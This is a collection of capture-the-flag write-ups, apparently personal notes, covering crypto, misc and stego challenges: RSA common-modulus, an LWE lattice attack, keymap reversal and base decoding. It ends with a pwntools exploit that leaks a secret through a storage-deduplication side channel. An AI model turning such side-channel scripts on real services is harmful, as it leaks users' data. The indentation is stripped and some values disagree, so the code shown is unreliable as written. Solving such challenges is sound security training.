[78, 17, 53, 28, 22, 75, 31, 67, 15, 94, 3, 80, 4, 62, 16, 14, 9, 53, 56, 92],
[16, 39, 5, 42, 96, 35, 31, 47, 55, 58, 88, 24, 0, 17, 54, 24, 36, 29, 85, 57],
[86, 56, 0, 48, 35, 71, 89, 7, 5, 44, 44, 37, 44, 60, 21, 58, 51, 54, 17, 58],
[19, 8, 81, 68, 5, 94, 47, 69, 28, 73, 92, 13, 86, 52, 17, 77, 4, 89, 55, 40],
[4, 52, 8, 83, 97, 35, 99, 16, 7, 97, 57, 32, 16, 26, 26, 79, 33, 27, 98, 66],
[88, 36, 68, 87, 57, 62, 20, 72, 3, 46, 33, 67, 46, 55, 12, 32, 63, 93, 53, 69],
[4, 42, 16, 73, 38, 25, 39, 11, 24, 94, 72, 18, 8, 46, 29, 32, 40, 62, 76, 36],
[20, 69, 36, 41, 72, 30, 23, 88, 34, 62, 99, 69, 82, 67, 59, 85, 74, 4, 36, 16],
[20, 73, 35, 29, 78, 31, 90, 1, 74, 31, 49, 71, 48, 86, 81, 16, 23, 57, 5, 54],
[1, 70, 54, 71, 83, 51, 54, 69, 16, 92, 33, 48, 61, 43, 52, 1, 89, 19, 67, 48]]
aa = [[]for i in range(4)]
for j in range(20):
for i in range(17):
aa[0].append(a[j][i]*a[j][i+1]*a[j][i+2]*a[j][i+3])
aa[1].append(a[i][j]*a[i+1][j]*a[i+2][j]*a[i+3][j])
for i in range(17):
for j in range(17):
aa[2].append(a[i][j]*a[i+1][j+1]*a[i+2][j+2]*a[i+3][j+3])
aa[3].append(a[i+3][j]*a[i+2][j+1]*a[i+1][j+2]*a[i][j+3])
for i in range(len(aa)):
print(max(aa[i]))

ezflow

#open in wireshark
#export zinfile from pcap
#find zip password from pcap data ,filter all sql timeout injection
#unzip file by password can get flag

task.py

from Crypto.Util.number import *
from flag import *
m = bytes_to_long(flag)
n = 2748281443944427868843369402621263042158244258427433547653329234844505048333691189629107146775166551897070384880309396022510445087966911639388490862151
e1 = 65537
e2 = 992923
c1 = pow(m,e1,n)
c2 = pow(m,e2,n)
#c1 = 285685918239736826397269350382490971822513853503791279402545608976504614743806744945079572548121135341824742716166350238418142063969240075997981863636
#c2 = 129273488481770576836913112982915335157542027932363877138157510043383503149178933085861517442700435060934412452576721945085276483980455830616742529117

exp.py

#give e1,e2,c1,c2,n
#find m
import gmpy2
from Crypto.Util.number import long_to_bytes,bytes_to_long
n = 2748281443944427868843369402621263042158244258427433547653329234844505048333691189629107146775166551897070384880309396022510445087966911639388490862151
e1 = 65537
e2 = 992923
c1 = 285685918239736826397269350382490971822513853503791279402545608976504614743806744945079572548121135341824742716166350238418142063969240075997981863636
c2 = 129273488481770576836913112982915335157542027932363877138157510043383503149178933085861517442700435060934412452576721945085276483980455830616742529117
_, r, s = gmpy2.gcdext(e1, e2)
m = gmpy2.powmod(c1, r, n) * gmpy2.powmod(c2, s, n) % n
print(long_to_bytes(m))

checkin

#GY3DMYZWGE3DON3CGQZTGNZUGY2WMNJXGZTDOMRTGE3DINLGGQ4TGNJVMY2TGMZQGVTDINRXGU3GKNTFG44TKZRUHA3GMNZQGMZTKZRVHEZTANZVGVTDIYZWHE3GENRVGVTDGMJXGQ3WI
open cryberChef aoto decode

Capture Radiate Chart

get_rar.py

data = open('alien.png','rb').read()
flag = ''
pos = data.index(b'IDAT')
data = data[pos+5:]
while 1:
try:
pos = data.index(b'IDAT')
flag += str(hex(data[pos-5])[2:].zfill(2))
data = data[pos+5:]
except:
f1 = open('out.rar','w')
f1.write(flag)

ILOVEYOU

image-20230604014025638

# open http://www.cmd5.com/ decode find flag

bob’s enc

task.py

from secret import *
import random
prime =  2141
print len(flag)
flag = map(ord,flag)
flag1 = flag[:21]
flag2 = flag[21:]
row = 64
def add(msg1,msg2):
return [(x+y)%prime for x,y in zip(msg1,msg2)]
def multi(msg1,msg2):
out = []
for l in msg1:
s = 0
for x,y in zip(l,msg2):
s += (x*y)%prime
s %= prime
out.append(s)
return out
def genkey(leng):
l = [[] for i in range(row)]
for x in range(row):
for i in range(leng):
l[x].append(random.randint(0,511))
return l
key = genkey(len(flag1))
print key
cipher1 = multi(key,flag1)
print cipher1
cipher2 = multi(key,flag2)
noise = [random.randint(0,6) for i in range(row)]
print add(noise,cipher2)

exp.py

from sage.all import *
from sage.modules.free_module_integer import IntegerLattice
from random import randint
import sys
from itertools import starmap
from operator import mul
with open('out', 'r') as f:
key = eval(f.readline())
c1 = eval(f.readline())
c2 = eval(f.readline())
prime = 2141
K = matrix(Zmod(prime), key[:21])
C1 = vector(Zmod(prime), c1[:21])
m1 = K.inverse() * C1
flag = ''
for i in m1:
flag += chr(i)
print(flag)
# Babai's Nearest Plane algorithm
def Babai_closest_vector(M, G, target):
small = target
for _ in range(5):
for i in reversed(range(M.nrows())):
c = ((small * G[i]) / (G[i] * G[i])).round()
small -= M[i] * c
return target - small
m = 64
n = 21
q = prime
A_values = key
b_values = c2
A = matrix(ZZ, m + n, m)
for i in range(m):
A[i, i] = q
for x in range(m):
for y in range(n):
A[m + y, x] = A_values[x][y]
lattice = IntegerLattice(A, lll_reduce=True)
# print("LLL done")
gram = lattice.reduced_basis.gram_schmidt()[0]
target = vector(ZZ, b_values)
res = Babai_closest_vector(lattice.reduced_basis, gram, target)
# print("Closest Vector: {}".format(res))
R = IntegerModRing(q)
M = Matrix(R, A_values)
ingredients = M.solve_right(res)
# print("Ingredients: {}".format(ingredients))
for i in ingredients:
flag += chr(i)
print(flag)
#get flag
sage exp.py

babyqmk

SEED = 0
KC_A = 4
KC_Z = 29
KC_1 = 30
KC_9 = 38
KC_0 = 39
def rand():
global SEED
SEED = 214013 * SEED + 2531011
return (SEED >> 16) & 0x7fff
keycodeToKey = {0:'KC_NO', 1:'KC_TRANSPARENT', 2:'KC_POST_FAIL', 3:'KC_UNDEFINED',
4:'KC_A', 5:'KC_B', 6:'KC_C', 7:'KC_D', 8:'KC_E', 9:'KC_F', 10:'KC_G', 11:'KC_H',
12:'KC_I', 13:'KC_J', 14:'KC_K', 15:'KC_L', 16:'KC_M', 17:'KC_N', 18:'KC_O', 19:'KC_P',
20:'KC_Q', 21:'KC_R', 22:'KC_S', 23:'KC_T', 24:'KC_U', 25:'KC_V', 26:'KC_W', 27:'KC_X',
28:'KC_Y', 29:'KC_Z', 30:'KC_1', 31:'KC_2', 32:'KC_3', 33:'KC_4', 34:'KC_5', 35:'KC_6',
36:'KC_7', 37:'KC_8', 38:'KC_9', 39:'KC_0', 40:'KC_ENTER', 41:'KC_ESCAPE',
42:'KC_BACKSPACE', 43:'KC_TAB', 44:'KC_SPACE', 45:'KC_MINUS', 46:'KC_EQUAL',
47:'KC_LEFT_BRACKET', 48:'KC_RIGHT_BRACKET', 49:'KC_BACKSLASH', 50:'KC_NONUS_HASH',
51:'KC_SEMICOLON', 52:'KC_QUOTE', 53:'KC_GRAVE', 54:'KC_COMMA', 55:'KC_DOT',
56:'KC_SLASH', 57:'KC_CAPS_LOCK', 58:'KC_F1', 59:'KC_F2', 60:'KC_F3', 61:'KC_F4',
62:'KC_F5', 63:'KC_F6', 64:'KC_F7', 65:'KC_F8', 66:'KC_F9', 67:'KC_F10', 68:'KC_F11',
69:'KC_F12', 70:'KC_PRINT_SCREEN', 71:'KC_SCROLL_LOCK', 72:'KC_PAUSE', 73:'KC_INSERT',
74:'KC_HOME', 75:'KC_PAGE_UP', 76:'KC_DELETE', 77:'KC_END', 78:'KC_PAGE_DOWN',
79:'KC_RIGHT', 80:'KC_LEFT', 81:'KC_DOWN', 82:'KC_UP', 83:'KC_NUM_LOCK',
84:'KC_KP_SLASH', 85:'KC_KP_ASTERISK', 86:'KC_KP_MINUS', 87:'KC_KP_PLUS',
88:'KC_KP_ENTER', 89:'KC_KP_1', 90:'KC_KP_2', 91:'KC_KP_3', 92:'KC_KP_4', 93:'KC_KP_5',
94:'KC_KP_6', 95:'KC_KP_7', 96:'KC_KP_8', 97:'KC_KP_9', 98:'KC_KP_0', 99:'KC_KP_DOT',
100:'KC_NONUS_BACKSLASH', 101:'KC_APPLICATION', 102:'KC_KB_POWER', 103:'KC_KP_EQUAL',
104:'KC_F13', 105:'KC_F14', 106:'KC_F15', 107:'KC_F16', 108:'KC_F17', 109:'KC_F18',
110:'KC_F19', 111:'KC_F20', 112:'KC_F21', 113:'KC_F22', 114:'KC_F23', 115:'KC_F24',
116:'KC_EXECUTE', 117:'KC_HELP', 118:'KC_MENU', 119:'KC_SELECT', 120:'KC_STOP',
121:'KC_AGAIN', 122:'KC_UNDO', 123:'KC_CUT', 124:'KC_COPY', 125:'KC_PASTE',
126:'KC_FIND', 127:'KC_KB_MUTE', 128:'KC_KB_VOLUME_UP', 129:'KC_KB_VOLUME_DOWN',
130:'KC_LOCKING_CAPS_LOCK', 131:'KC_LOCKING_NUM_LOCK', 132:'KC_LOCKING_SCROLL_LOCK',
133:'KC_KP_COMMA', 134:'KC_KP_EQUAL_AS400', 135:'KC_INTERNATIONAL_1',
136:'KC_INTERNATIONAL_2', 137:'KC_INTERNATIONAL_3', 138:'KC_INTERNATIONAL_4',
139:'KC_INTERNATIONAL_5', 140:'KC_INTERNATIONAL_6', 141:'KC_INTERNATIONAL_7',
142:'KC_INTERNATIONAL_8', 143:'KC_INTERNATIONAL_9', 144:'KC_LANGUAGE_1',
145:'KC_LANGUAGE_2', 146:'KC_LANGUAGE_3', 147:'KC_LANGUAGE_4', 148:'KC_LANGUAGE_5',
149:'KC_LANGUAGE_6', 150:'KC_LANGUAGE_7', 151:'KC_LANGUAGE_8', 152:'KC_LANGUAGE_9',
153:'KC_ALTERNATE_ERASE', 154:'KC_SYSTEM_REQUEST', 155:'KC_CANCEL', 156:'KC_CLEAR',
157:'KC_PRIOR', 158:'KC_RETURN', 159:'KC_SEPARATOR', 160:'KC_OUT', 161:'KC_OPER',
162:'KC_CLEAR_AGAIN', 163:'KC_CRSEL', 164:'KC_EXSEL', 224:'KC_LEFT_CTRL',
225:'KC_LEFT_SHIFT', 226:'KC_LEFT_ALT', 227:'KC_LEFT_GUI', 228:'KC_RIGHT_CTRL',
229:'KC_RIGHT_SHIFT', 230:'KC_RIGHT_ALT', 231:'KC_RIGHT_GUI'}
keymaps = [0x0029, 0x0000, 0x003A, 0x003B, 0x003C, 0x003D, 0x0000, 0x003E,
0x003F, 0x0040, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046,
0x0047, 0x0048, 0x0035, 0x001E, 0x001F, 0x0020, 0x0021, 0x0022,
0x0023, 0x0024, 0x0025, 0x0026, 0x0027, 0x002D, 0x002E, 0x002A,
0x0000, 0x0049, 0x004A, 0x004B, 0x002B, 0x0000, 0x0014, 0x001A,
0x0008, 0x0015, 0x0017, 0x001C, 0x0018, 0x000C, 0x0012, 0x0013,
0x002F, 0x0030, 0x0031, 0x004C, 0x004D, 0x004E, 0x0039, 0x0000,
0x0004, 0x0016, 0x0007, 0x0009, 0x000A, 0x000B, 0x000D, 0x000E,
0x000F, 0x0033, 0x0034, 0x0028, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x00E1, 0x001D, 0x001B, 0x0006, 0x0019, 0x0005, 0x0011,
0x0010, 0x0036, 0x0037, 0x0038, 0x0000, 0x00E5, 0x0000, 0x0000,
0x0052, 0x0000, 0x00E0, 0x00E3, 0x0000, 0x00E2, 0x0000, 0x0000,
0x002C, 0x0000, 0x0000, 0x0000, 0x00E6, 0x00E7, 0x0000, 0x0065,
0x00E4, 0x0050, 0x0051, 0x004F, 0x0029, 0x0000, 0x003A, 0x003B,
0x003C, 0x003D, 0x0000, 0x003E, 0x003F, 0x0040, 0x0041, 0x0042,
0x0043, 0x0044, 0x0045, 0x0046, 0x0047, 0x0048, 0x0035, 0x0012,
0x0013, 0x000D, 0x0020, 0x001B, 0x0016, 0x000E, 0x0005, 0x0011,
0x001A, 0x002D, 0x002E, 0x002A, 0x0000, 0x0049, 0x004A, 0x004B,
0x002B, 0x0000, 0x0015, 0x000A, 0x0027, 0x0022, 0x0009, 0x0018,
0x0024, 0x0023, 0x0017, 0x0006, 0x002F, 0x0030, 0x0031, 0x004C,
0x004D, 0x004E, 0x0039, 0x0000, 0x0007, 0x0004, 0x0010, 0x000C,
0x0019, 0x0008, 0x001C, 0x0014, 0x000F, 0x0033, 0x0034, 0x0028,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x00E1, 0x001F, 0x000B,
0x001E, 0x0025, 0x001D, 0x0026, 0x0021, 0x0036, 0x0037, 0x0038,
0x0000, 0x00E5, 0x0000, 0x0000, 0x0052, 0x0000, 0x00E0, 0x00E3,
0x0000, 0x00E2, 0x0000, 0x0000, 0x002C, 0x0000, 0x0000, 0x0000,
0x00E6, 0x00E7, 0x0000, 0x0065, 0x00E4, 0x0050, 0x0051, 0x004F,
0x0029, 0x0000, 0x003A, 0x003B, 0x003C, 0x003D, 0x0000, 0x003E,
0x003F, 0x0040, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046,
0x0047, 0x0048, 0x0035, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001,
0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x002D, 0x002E, 0x002A,
0x0000, 0x0049, 0x004A, 0x004B, 0x002B, 0x0000, 0x0025, 0x0004,
0x0023, 0x0015, 0x0008, 0x001D, 0x0019, 0x001F, 0x0006, 0x0027,
0x002F, 0x0030, 0x0031, 0x004C, 0x004D, 0x004E, 0x0039, 0x0000,
0x0010, 0x0007, 0x000F, 0x0009, 0x0021, 0x0022, 0x001E, 0x0026,
0x000B, 0x0033, 0x0034, 0x0028, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x00E1, 0x0018, 0x001C, 0x0024, 0x0014, 0x0017, 0x000C,
0x000A, 0x0036, 0x0037, 0x0038, 0x0000, 0x00E5, 0x0000, 0x0000,
0x0052, 0x0000, 0x00E0, 0x00E3, 0x0000, 0x00E2, 0x0000, 0x0000,
0x002C, 0x0000, 0x0000, 0x0000, 0x00E6, 0x00E7, 0x0000, 0x0065,
0x00E4, 0x0050, 0x0051, 0x004F]
LayerMap = [dict(), dict(), dict()]
def buildLayerMap(layer):
for i in range(108):
curr_keycode = keymaps[layer * 108 + i]
if curr_keycode == 1: # KC_TRANSPARENT
curr_keycode = keymaps[(layer - 1) * 108 + i]
LayerMap[layer][ keycodeToKey[ curr_keycode ] ] = keycodeToKey[ keymaps[i] ]
def formatLayer():
for layer in range(0, 3):
for col in range(6):
for row in range(18):
print(keycodeToKey[ keymaps[layer * 108 + col * 18 + row]].ljust(15),end=',')
print()
print()
formatLayer()
buildLayerMap(1)
buildLayerMap(2)
SEED = rand()
sum = 0
enc = "1CTED8IL-BIMM-SMFP-HOKP-HOIDRZL4W6KR"
Table = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
flag=""
for i in range(36):
rand()
Layer_stat = (i // 18) + 1
if enc[i] in Table:
if Layer_stat == 1:
keycode = Table.index(enc[i]) - (rand() % 36)
if keycode < KC_A:
keycode += 36
sum += keycode
else:
keycode = Table.index(enc[i]) + (sum % 40)
if keycode > KC_0:
keycode -= 36
sum += keycode
flag += LayerMap[ Layer_stat ][ keycodeToKey[keycode] ][3:]
else:
flag += enc[i]
print("flag{" + flag + "}")

01世界

stegsolve 01.png
#click left color map get qrcode
#decode qrcode get flag

Base

#give 31332b353d3f3f3f2d2d2d2d7a6d6a74706d3838757366677a6d797474736467746d65697a6c6c74787a6d657a61646a766d6f66757365677262776b7a77666a7a61796f7a646d75373d3d3d
ctf-party 31332b353d3f3f3f2d2d2d2d7a6d6a74706d3838757366677a6d797474736467746d65697a6c6c74787a6d657a61646a766d6f66757365677262776b7a77666a7a61796f7a646d75373d3d3d from_hex
#get
13+5=???----zmjtpm88usfgzmyttsdgtmeizlltxzmezadjvmofusegrbwkzwfjzayozdmu7===
#后面部分很像base64,13+5联想到ROT13+ROT5,解密得到
mzwgcz33hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh2===
根据题目Base32解密为flag{9e6ef1a3f5f0e31cadd29c297bef5ad2}

exp.rb

require 'ctf_party'
#后面部分很像base64,13+5联想到ROT13+ROT5
s = "zmjtpm88usfgzmyttsdgtmeizlltxzmezadjvmofusegrbwkzwfjzayozdmu7==="
r13 = s.rot(shift: 13)
r5 = s.rot(shift: 5)
p r13  # mzwgcz88hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh7===

Filestore(Google_CTF)

task.py

import os, secrets, string, time
# from flag import flag
# my flag
flag = "flag{1ww717-nxnxksn-xsnjxsnxjs}"
def main():
# It's a tiny server...
blob = bytearray(2**16)
files = {}
used = 0
# Use deduplication to save space.
def store(data):
nonlocal used
MINIMUM_BLOCK = 16
MAXIMUM_BLOCK = 1024
part_list = []
while data:
prefix = data[:MINIMUM_BLOCK]
ind = -1
bestlen, bestind = 0, -1
while True:
ind = blob.find(prefix, ind+1)
if ind == -1: break
length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))
if length > bestlen:
bestlen, bestind = length, ind
if bestind != -1:
part, data = data[:bestlen], data[bestlen:]
part_list.append((bestind, bestlen))
else:
part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
blob[used:used+len(part)] = part
part_list.append((used, len(part)))
used += len(part)
assert used <= len(blob)
fid = "".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))
files[fid] = part_list
return fid
def load(fid):
data = []
for ind, length in files[fid]:
data.append(blob[ind:ind+length])
return b"".join(data)
print("Welcome to our file storage solution.")
# Store the flag as one of the files.
store(bytes(flag, "utf-8"))
while True:
print()
print("Menu:")
print("- load")
print("- store")
print("- status")
print("- exit")
choice = input().strip().lower()
if choice == "load":
print("Send me the file id...")
fid = input().strip()
data = load(fid)
print(data.decode())
elif choice == "store":
print("Send me a line of data...")
data = input().strip()
fid = store(bytes(data, "utf-8"))
print("Stored! Here's your file id:")
print(fid)
elif choice == "status":
print("User: ctfplayer")
print("Time: %s" % time.asctime())
kb = used / 1024.0
kb_all = len(blob) / 1024.0
print("Quota: %0.3fkB/%0.3fkB" % (kb, kb_all))
print("Files: %d" % len(files))
elif choice == "exit":
break
else:
print("Nope.")
break
try:
main()
except Exception:
print("Nope.")
time.sleep(1)

exp.py

from pwn import *
local = True
debug = False
if local:
r = process(["python3", "task.py"], level='debug') if debug else process(["python3", "task.py"])
else:
r = remote("filestore.2021.ctfcompetition.com", 1337, level = 'debug') if debug else remote("filestore.2021.ctfcompetition.com", 1337)
possible_chars = [chr(i) for i in range(33, 127)]
FLAG = "flag{"
r.recvuntil(b"- exit\n")
for _ in range(30):
try:
for char in possible_chars:
r.sendline(b"status")
r.recvuntil(b"Quota: ")
current_quota = r.recvline(keepends=False)
r.sendline(b"store")
r.sendline(FLAG[-15:] + char)
r.sendline(b"status")
r.recvuntil(b"Quota: ")
new_quota = r.recvline(keepends=False)
if new_quota == current_quota:
FLAG += char
print(FLAG)
break
except EOFError:
if local:
r = process(["python3", "task.py"], level='debug') if debug else process(["python3", "task.py"])
else:
r = remote("filestore.2021.ctfcompetition.com", 1337, level = 'debug') if debug else remote("filestore.2021.ctfcompetition.com", 1337)